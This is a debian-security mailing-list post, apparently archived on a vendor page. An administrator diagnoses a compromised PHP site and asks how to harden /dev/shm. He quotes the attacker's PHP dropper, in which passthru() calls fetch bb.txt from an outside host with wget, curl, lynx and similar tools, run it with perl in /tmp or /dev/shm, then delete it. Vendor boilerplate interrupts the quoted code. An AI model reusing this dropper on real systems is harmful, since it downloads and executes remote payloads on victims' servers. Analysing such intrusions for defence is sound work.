Re: ping22: can not kill this process

Hi folks

       I found the issue, it is one of the php script allowing the remote script to run.

       and the remote script is something like:

<?php

 passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /tmp;curl -o bb.txt
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /tmp;lwp-download
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /tmp;lynx -source http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related lists.debian.org Links debian-announce debian-apache debian-arm-changes debian-beowulf debian-boot debian-cd debian-cd-vendors debian-changes debian-changes-digest debian-isp debian-kde debian-laptop debian-mirrors-announce debian-news debian-security debian-security-announce debian-testing debian-user debian-user-digest Request more information about Pantek

 passthru('cd /tmp;fetch http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /tmp;GET http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /dev/shm;wget http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /dev/shm;curl -o bb.txt
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /dev/shm;lwp-download
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /dev/shm;lynx -source http://www.radiovirtual.org/bb.txt
> bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /dev/shm;fetch http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related lists.debian.org Links debian-announce debian-apache debian-arm-changes debian-beowulf debian-boot debian-cd debian-cd-vendors debian-changes debian-changes-digest debian-isp debian-kde debian-laptop debian-mirrors-announce debian-news debian-security debian-security-announce debian-testing debian-user debian-user-digest Request more information about Pantek

 passthru('id');

?>

        the /tmp was mounted as rw,noexec,nosuid, so it cannot run.

        but not the /dev/shm, so the hacked script downloaded to /dev/shm, and run from there.

        what kind applications are using /dev/shm? I googled around,seem not find much information.
right now I mount i as rw,noexec,nosuid.

Best Regards

Mike

-- 
To UNSUBSCRIBE, email to debian-security-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org